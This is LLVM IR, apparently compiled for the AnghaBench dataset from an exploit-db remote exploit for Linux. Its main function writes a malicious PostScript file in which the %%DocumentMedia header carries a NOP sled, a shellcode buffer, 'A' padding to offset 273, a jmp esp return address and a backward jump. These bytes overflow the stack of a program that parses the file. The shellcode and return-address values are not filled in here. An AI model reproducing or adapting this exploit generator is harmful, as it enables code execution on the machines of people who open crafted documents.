; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_2858.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_2858.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [4 x i8] c"w+b\00", align 1
@.str.1 = private unnamed_addr constant [15 x i8] c"%s <file.ps>\0A\0A\00", align 1
@.str.2 = private unnamed_addr constant [46 x i8] c"[-] unable to open file '%s' for writing: %s\0A\00", align 1
@errno = common dso_local global i32 0, align 4
@.str.3 = private unnamed_addr constant [16 x i8] c"%!PS-Adobe-3.0\0A\00", align 1
@.str.4 = private unnamed_addr constant [19 x i8] c"%%Title: hello.ps\0A\00", align 1
@.str.5 = private unnamed_addr constant [61 x i8] c"%%For: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\0A\00", align 1
@.str.6 = private unnamed_addr constant [30 x i8] c"%%BoundingBox: 24 24 588 768\0A\00", align 1
@.str.7 = private unnamed_addr constant [18 x i8] c"%%DocumentMedia: \00", align 1
@cb = common dso_local global i8* null, align 8
@jmpesp = common dso_local global i8* null, align 8
@.str.8 = private unnamed_addr constant [6 x i8] c"\E9\02\FF\FF\FF\00", align 1
@.str.9 = private unnamed_addr constant [27 x i8] c"%%DocumentData: Clean7Bit\0A\00", align 1
@.str.10 = private unnamed_addr constant [26 x i8] c"%%Orientation: Landscape\0A\00", align 1
@.str.11 = private unnamed_addr constant [12 x i8] c"%%Pages: 1\0A\00", align 1
@.str.12 = private unnamed_addr constant [21 x i8] c"%%PageOrder: Ascend\0A\00", align 1
@.str.13 = private unnamed_addr constant [33 x i8] c"%%+ encoding ISO-8859-1Encoding\0A\00", align 1
@.str.14 = private unnamed_addr constant [15 x i8] c"%%EndComments\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32*, align 8
  %7 = alloca i32, align 4
  %8 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %9 = load i8**, i8*** %5, align 8
  %10 = getelementptr inbounds i8*, i8** %9, i64 1
  %11 = load i8*, i8** %10, align 8
  %12 = call i32* @fopen(i8* %11, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i64 0, i64 0))
  store i32* %12, i32** %6, align 8
  %13 = icmp ne i32* %12, null
  br i1 %13, label %25, label %14

14:                                               ; preds = %2
  %15 = load i8**, i8*** %5, align 8
  %16 = load i8*, i8** %15, align 8
  %17 = call i32 (i8*, i8*, ...) @printf(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.1, i64 0, i64 0), i8* %16)
  %18 = load i8**, i8*** %5, align 8
  %19 = getelementptr inbounds i8*, i8** %18, i64 1
  %20 = load i8*, i8** %19, align 8
  %21 = load i32, i32* @errno, align 4
  %22 = call i8* @strerror(i32 %21)
  %23 = call i32 (i8*, i8*, ...) @printf(i8* getelementptr inbounds ([46 x i8], [46 x i8]* @.str.2, i64 0, i64 0), i8* %20, i8* %22)
  %24 = call i32 @exit(i32 1) #3
  unreachable

25:                                               ; preds = %2
  %26 = load i32*, i32** %6, align 8
  %27 = call i32 @fputs(i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str.3, i64 0, i64 0), i32* %26)
  %28 = load i32*, i32** %6, align 8
  %29 = call i32 @fputs(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.4, i64 0, i64 0), i32* %28)
  %30 = load i32*, i32** %6, align 8
  %31 = call i32 @fputs(i8* getelementptr inbounds ([61 x i8], [61 x i8]* @.str.5, i64 0, i64 0), i32* %30)
  %32 = load i32*, i32** %6, align 8
  %33 = call i32 @fputs(i8* getelementptr inbounds ([30 x i8], [30 x i8]* @.str.6, i64 0, i64 0), i32* %32)
  %34 = load i32*, i32** %6, align 8
  %35 = call i32 @fputs(i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.7, i64 0, i64 0), i32* %34)
  store i32 0, i32* %7, align 4
  br label %36

36:                                               ; preds = %42, %25
  %37 = load i32, i32* %7, align 4
  %38 = icmp slt i32 %37, 100
  br i1 %38, label %39, label %45

39:                                               ; preds = %36
  %40 = load i32*, i32** %6, align 8
  %41 = call i32 @fputc(i8 signext -112, i32* %40)
  br label %42

42:                                               ; preds = %39
  %43 = load i32, i32* %7, align 4
  %44 = add nsw i32 %43, 1
  store i32 %44, i32* %7, align 4
  br label %36

45:                                               ; preds = %36
  %46 = load i8*, i8** @cb, align 8
  %47 = load i8*, i8** @cb, align 8
  %48 = call i32 @strlen(i8* %47)
  %49 = load i32*, i32** %6, align 8
  %50 = call i32 @fwrite(i8* %46, i32 %48, i32 1, i32* %49)
  %51 = load i8*, i8** @cb, align 8
  %52 = call i32 @strlen(i8* %51)
  %53 = add nsw i32 %52, 100
  store i32 %53, i32* %8, align 4
  br label %54

54:                                               ; preds = %60, %45
  %55 = load i32, i32* %8, align 4
  %56 = icmp slt i32 %55, 273
  br i1 %56, label %57, label %63

57:                                               ; preds = %54
  %58 = load i32*, i32** %6, align 8
  %59 = call i32 @fputc(i8 signext 65, i32* %58)
  br label %60

60:                                               ; preds = %57
  %61 = load i32, i32* %8, align 4
  %62 = add nsw i32 %61, 1
  store i32 %62, i32* %8, align 4
  br label %54

63:                                               ; preds = %54
  %64 = load i8*, i8** @jmpesp, align 8
  %65 = load i32*, i32** %6, align 8
  %66 = call i32 @fwrite(i8* %64, i32 4, i32 1, i32* %65)
  %67 = load i32*, i32** %6, align 8
  %68 = call i32 @fwrite(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.8, i64 0, i64 0), i32 5, i32 1, i32* %67)
  %69 = load i32*, i32** %6, align 8
  %70 = call i32 @fputc(i8 signext 10, i32* %69)
  %71 = load i32*, i32** %6, align 8
  %72 = call i32 @fputs(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.9, i64 0, i64 0), i32* %71)
  %73 = load i32*, i32** %6, align 8
  %74 = call i32 @fputs(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.10, i64 0, i64 0), i32* %73)
  %75 = load i32*, i32** %6, align 8
  %76 = call i32 @fputs(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.11, i64 0, i64 0), i32* %75)
  %77 = load i32*, i32** %6, align 8
  %78 = call i32 @fputs(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.12, i64 0, i64 0), i32* %77)
  %79 = load i32*, i32** %6, align 8
  %80 = call i32 @fputs(i8* getelementptr inbounds ([33 x i8], [33 x i8]* @.str.13, i64 0, i64 0), i32* %79)
  %81 = load i32*, i32** %6, align 8
  %82 = call i32 @fputs(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.14, i64 0, i64 0), i32* %81)
  ret i32 0
}

declare dso_local i32* @fopen(i8*, i8*) #1

declare dso_local i32 @printf(i8*, i8*, ...) #1

declare dso_local i8* @strerror(i32) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @fputs(i8*, i32*) #1

declare dso_local i32 @fputc(i8 signext, i32*) #1

declare dso_local i32 @fwrite(i8*, i32, i32, i32*) #1

declare dso_local i32 @strlen(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
